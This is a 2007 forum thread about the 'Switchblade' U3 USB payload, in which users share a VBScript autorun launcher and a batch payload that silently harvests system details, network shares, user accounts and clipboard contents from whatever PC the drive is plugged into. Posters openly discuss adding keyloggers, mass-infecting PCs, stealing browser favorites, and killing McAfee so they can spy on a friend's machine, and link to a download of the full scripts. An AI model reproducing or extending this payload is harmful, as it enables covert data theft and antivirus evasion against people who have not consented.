tijgert Posted November 10, 2007 Share Posted November 10, 2007 Any chance for an update of the Config tool with an extra check box with which you can enable/disable your own addition? I'd like to add a keylogger remote install package, but make it nicely switchable from the config menu like all the other items. I can modify the needed scripts to add my tool and check for the *.dat file, but I can't alter the Config tool. Having said that; I have a feature suggestion. We don't all remember to hold the shift key when inserting our U3's in our PC's and we don't all want to disable autorun all the time. I'm not happy with 'accidentally' infecting myself every time and would like an option (a simple check box would do) that makes installing-hacks runĀ only once or every time. An alternate method I think would be to modify the Go.bat to delete the 2.dat and 3.dat files after the execution of the appropriate section so that upon reinsertion the flag now shows not to install the hacks (but that kills the option to mass infect PC's). Any comments? Quote Link to comment Share on other sites More sharing options...
chiquita4011 Posted November 11, 2007 Share Posted November 11, 2007 Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below. . . Ā Ā * 1.Ā Extract the ISO to the root of your flash drive. Ā Ā * 2.Ā Edit the AUTORUN. INF Ā Ā * 3.Ā Run SBConfig from your flash drive. After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working? Quote Link to comment Share on other sites More sharing options...
GonZor Posted November 11, 2007 Share Posted November 11, 2007 Also for those looking for a non-U3 version I have a temporary solution, follow the simple instructions below. . . Ā Ā * 1.Ā Extract the ISO to the root of your flash drive. Ā Ā * 2.Ā Edit the AUTORUN. INF Ā Ā * 3.Ā Run SBConfig from your flash drive. After we've run SBConfig from the flash drive and configured and saved our payload, is there any necessity to keep it on the flash drive after for the payload to remain working? No sbconfig is only used to customize the payload (eg turn options on or off) if you remove sbconfig.exe the payload will still function the way it is set up but I recommend keeping a copy of sbconfig somewhere in case you need to configure the payload again. Quote Link to comment Share on other sites More sharing options...
detox420 Posted November 12, 2007 Share Posted November 12, 2007 GonZor i was just wondering if you knew anything about ".job" files or there file format or anything. a few of my buddies are working on a Windows hack that works in a limited account and so far it works just crashes in a limited account. Anyways the hack uses the "System" Login Expliot using an At Command and ect if you would like to help us work on this send me a message. Quote Link to comment Share on other sites More sharing options...
GonZor Posted November 12, 2007 Share Posted November 12, 2007 GonZor i was just wondering if you knew anything about ".job" files or there file format or anything. a few of my buddies are working on a Windows hack that works in a limited account and so far it works just crashes in a limited account. Anyways the hack uses the "System" Login Expliot using an At Command and ect if you would like to help us work on this send me a message. You cant use the AT command from a limited account that would be why it is crashing. Basically you are trying to elevate your privileges using an exploit that needs elevated privileges... You need to find another way to elevate your privileges. Quote Link to comment Share on other sites More sharing options...
detox420 Posted November 12, 2007 Share Posted November 12, 2007 it would be much easier for me to explain this to you via messenger But if your uncomfortable with that i will attempt to elaborate. Basicly since you cant do an At command in limited user we made a ".job" already made to do that and detect the time and run a minute later the problem is that the scheduled task creates and it looks completely legit and you can see it in the scheduled tasks folder and such but it never executes not even as an admin. and i believe that we need to know about ".job" files i can send you sources and such if you believe you can help us i have many messenger s you can reach me at. Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 13, 2007 Share Posted November 13, 2007 I made some updates to your scripts, nice job btw. go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better then crashing and posting a dialog to the user victim. I've included only what's different otherwise I'm over the max characters for message: Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) For Each objDrive in colDrives Ā Ā 'ignore floppy drives - reserved by BIOS if they don't exist Ā Ā If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then Ā Ā Ā Ā Ā Ā If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then Ā Ā Ā Ā Ā Ā Ā Ā strfd = objDrive.Driveletter & ":" Ā Ā Ā Ā Ā Ā End If Ā Ā Ā Ā Ā Ā If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then Ā Ā Ā Ā Ā Ā Ā Ā strU3 = objDrive.Driveletter & ":" Ā Ā Ā Ā Ā Ā End If Ā Ā End if Next If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then Ā Ā Ā objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3Ā & "," & strDate & "," & strTime, 0, False End If If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then Ā Ā Ā objShell.Run ".LaunchU3.exe -a" Ā Ā Ā End If go.bat I've added nircmd to grab the clipboard contents and winaudit (google it) :: Props: Setzer1411, Marc, rpk5000 :: fd = flash partition (writable) :: U3 = cdrom partition (readonly) @ECHO off If %computername%.==. SET computername=computer If %username%.==. SET username=None SET fd=%1System SET U3=%2SystemSRC CD %U3% >NUL :: SET LOG PATHS Ā Ā Ā Ā IF NOT EXIST %fd%Logs%computername% ( Ā Ā Ā Ā Ā Ā Ā Ā MD %fd%Logs%computername% Ā Ā Ā Ā Ā Ā Ā Ā ) Ā Ā Ā Ā SET logdir=%fd%Logs%computername% Ā Ā Ā Ā SET log="%fd%Logs%computername%%computername%-[%3-%4].log" Ā Ā Ā Ā SET tmplog="%fd%Logs%computername%%computername%_TEMP.log" Ā Ā Ā Ā SET include="%fd%SRCInclude Ā Ā Ā Ā SET /p eipurl=<"%1SystemSRCIncludeEIP.dat" Ā Ā Ā Ā SET /p winaud=<"%1SystemSRCIncludewinaud.dat" :: PAYLOAD ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1 ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1 IF EXIST %include%0.dat" ( Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Ā Ā Ā Ā ECHO +----------------------------------+ >> %log% 2>&1 Ā Ā Ā Ā ECHO +Ā Ā Ā Ā Ā [System info]Ā Ā Ā Ā Ā Ā Ā + >> %log% 2>&1 Ā Ā Ā Ā ECHO +----------------------------------+ >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā IPCONFIG /all >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +Ā Ā Ā Ā Ā Ā Ā SharesĀ Ā Ā Ā Ā Ā Ā Ā Ā +Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā Ā net share >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +Ā Ā Ā Ā Ā Ā Ā UsersĀ Ā Ā Ā Ā Ā Ā Ā +Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā Ā net user >> %log% 2>&1 Ā Ā Ā Ā ) Ā Ā Ā Ā Ā Ā Ā Ā IF EXIST %include%19.dat" ( Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +Ā Ā Ā Ā Ā Ā ClipboardĀ Ā Ā Ā Ā Ā Ā +Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā Ā .nircmd.exe clipboard addfile %log% Ā Ā Ā Ā ) IF EXIST %include%20.dat" ( Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +Ā Ā Ā Ā Ā Ā Win AuditĀ Ā Ā Ā Ā Ā Ā +Ā >> %log% 2>&1 Ā Ā Ā Ā Echo +-----------------------------------+Ā >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā ECHO WinAudit saved to %logdir% >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txtĀ >> %log% 2>&1 Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā Ā ECHO. >> %log% 2>&1Ā Ā Ā Ā Ā Ā Ā Ā ) Ā Ā Ā Ā ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 :End Ā Ā Ā Ā EXIT winaud.dat rtfm for winaudit to see what the switches do /r=oxutn /o=PDF /m=CA Security Scan Also for the EIP I use http://checkip.dyndns.org/ You could use regular expressions to remove the extra HTML <html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html> but it gets the job done and uses a public server Take a look at nircmd if you haven't already it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;) Quote Link to comment Share on other sites More sharing options...
tijgert Posted November 14, 2007 Share Posted November 14, 2007 Hmm.. this is really good stuff, nice job on improving on what already seems to be an Ace tool. I'll attempt to implement all the changes myself and add my own little keylogger to it as well. Any chance you might upload your full scripts somewhere for us to leech? (I as a noob at scripts and zero knowledge of vbs would like to see if I got the implementation right... I'm learning). Quote Link to comment Share on other sites More sharing options...
detox420 Posted November 14, 2007 Share Posted November 14, 2007 im testing the mod now feed back soon and if anyone can help me with my ".job" problem please let me know Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted November 14, 2007 Share Posted November 14, 2007 Nice code Quote Link to comment Share on other sites More sharing options...
tijgert Posted November 14, 2007 Share Posted November 14, 2007 Oh bollocks... I tried to implement the changes but I just get stuck at what to leave in from the old code and what to eraseĀ :-( Makes me feel ignorant... any chance for that upload somewhere then?Ā :? Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 15, 2007 Share Posted November 15, 2007 http://www.frontiernet.net/~wardriver/U3CUSTOM.zip That's got just the scripts and .dat files needed Items in the FD folder need to go on the flash partition sans the FD folder Quote Link to comment Share on other sites More sharing options...
tijgert Posted November 16, 2007 Share Posted November 16, 2007 Thanks a bunch. I got pretty far on my own but definately needed your help. I like the multitone beeps, I just had three single 2600Hz chimes. Now I also think I figured out how to make the payload run files from the FD, something my keylogger will be most greatfull for :) The only other changes I made was add a search history backup and make most outputs in HTML format (looks so much better). The only (Nir)tool that didn't have command line options was the favorites backup... but I mailed him asking for an update to that (don't know any other way to steal favorites). You're a sport! Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 16, 2007 Share Posted November 16, 2007 I'd like to see that HTML output. I'm working on that now myself. Quote Link to comment Share on other sites More sharing options...
tijgert Posted November 16, 2007 Share Posted November 16, 2007 Actually most Nirtools have the /shtml switch to do that for you. Just replace the /stext for /shtml. Even an Uebernoob like me could do thatĀ 8-) Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 17, 2007 Share Posted November 17, 2007 Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc. Quote Link to comment Share on other sites More sharing options...
tijgert Posted November 17, 2007 Share Posted November 17, 2007 Complicated even is too complicated to spell for meĀ :-? Na, as a real noob I can copy stuff, copy paste stuff and delete stuff. I can think, but I cannot create. Another small addition I made (read: copy paste) is add avkill to the package. McAffee keeps bugging me when trying to spy, so it's gotta go. avkill now runs first, next time I'm at my friends place (where I also got the drive error btw) I'll see if I can beat McAffee on the draw and check if the drive issue is gone. Should be another two hurdles taken I think... Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 17, 2007 Share Posted November 17, 2007 Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for. Quote Link to comment Share on other sites More sharing options...
GonZor Posted November 18, 2007 Share Posted November 18, 2007 Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for. Firstly nice work on modifying the payload, Secondly the way I see the USB Hacks section is a community project where people build upon others ideas to create something bigger and better. I doubt anyone would object to you rewriting the batchfiles in vbs. Once your done let me know and with your approval it may make its way into the payload, Also if you get stuck I can help. Quote Link to comment Share on other sites More sharing options...
HarshReality Posted November 18, 2007 Share Posted November 18, 2007 If I could just get around th av issue it would be perfect. Also I have been wandering about the code.. I noticed one of the otehr projects had the run disabled if "safety.txt was on the C drive (goto end) and I cant see that anywhere in the code (or am I missing it) hold in mind guys Im just getting the hang of this. Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 19, 2007 Share Posted November 19, 2007 I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser. @HarshReality The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script. The 2 ways I know to keep from scanning yourself: 1. checks for presence of file "X" 2. checks computername/user against list stored in file on U3 Personally I would go with 1, less of paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive. Quote Link to comment Share on other sites More sharing options...
Monkeymook Posted November 20, 2007 Share Posted November 20, 2007 Ok.Ā I've been trying to get this to work for about a week or two now, and progress is null.Ā I'm not a complete newb at using the payloads, just installing them.Ā Now, I get all the files extracted, and replace the u3custom ISO in the bin folder from GonZor's package, then run the customizer.Ā It formats the drive with the files on the CD partition and I eject the drive and replace it, then I move the SBConfig file to the Flash part, and run it.Ā It works.Ā Now my issue is, when the Switchblade is used on another computer, it doesn't run.Ā It still works through the Amish technique, and I end up with a successful log, but is there some extra file that was left out of a zip file, or something? Quote Link to comment Share on other sites More sharing options...
trustme Posted November 20, 2007 Share Posted November 20, 2007 Do you have the payload on (Theres a button to turn the whole payload on and off at once) and hidden and system files viewable on the machine you're accessing the logs on (you're looking in the system folder for the logs right?)? If you have those all correct, can you provide me with the following information? Your PC: OS Version of the payload and sbconfig Test PC: OS Autorun disabled (Yes/No) Quote Link to comment Share on other sites More sharing options...
Monkeymook Posted November 20, 2007 Share Posted November 20, 2007 Yep. All the files are set up in the correct structure. Hidden files are shown, and logs are in the system folder. My PC: Windows XP MCE 2005 Um...define payload. As in Universal Customizer? Then in that case, 1.0.0.8 SBConfig: 2.0.0.18 Test PC: Windows XP Home Autorun enabled In the start of this thread, I know there is a post showing all the files that are needed for this to run. Now I'm sure that post is outdated, as new files may have been made, but I noticed a "Start.bat" file in that list that needs to be in the original version of that payload. Should I have that? Quote Link to comment Share on other sites More sharing options...
blub Posted November 20, 2007 Share Posted November 20, 2007 hi this was actually the first payload i ever tried.Ā i was a bit afraid, cuz i read that it is supposed not to be possible to install it throu VM-systems.Ā But the only available xp system was my VM.Ā And i got it to run without a single problem.Ā I am so happy that i just wanted to let you know :-) and that i realy really like your work!! THUMBS UP!! What really feels handy is the option to turn U3LP on/off and turn the payload on/off Would it be also possible to also turn the u3 functionality on/off?? the idea behind it is, that i run into a situation where i simply wanted to use my stick as a storage stick but the host pc didnt even recognize my stick, cuz of the restricted accounts or whatever they did to it, that didnt allow the u3 partition to run. which stoped the whole stick from being recognized. cuz of me being more into economics than writing codes, i dont know if it is possible Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.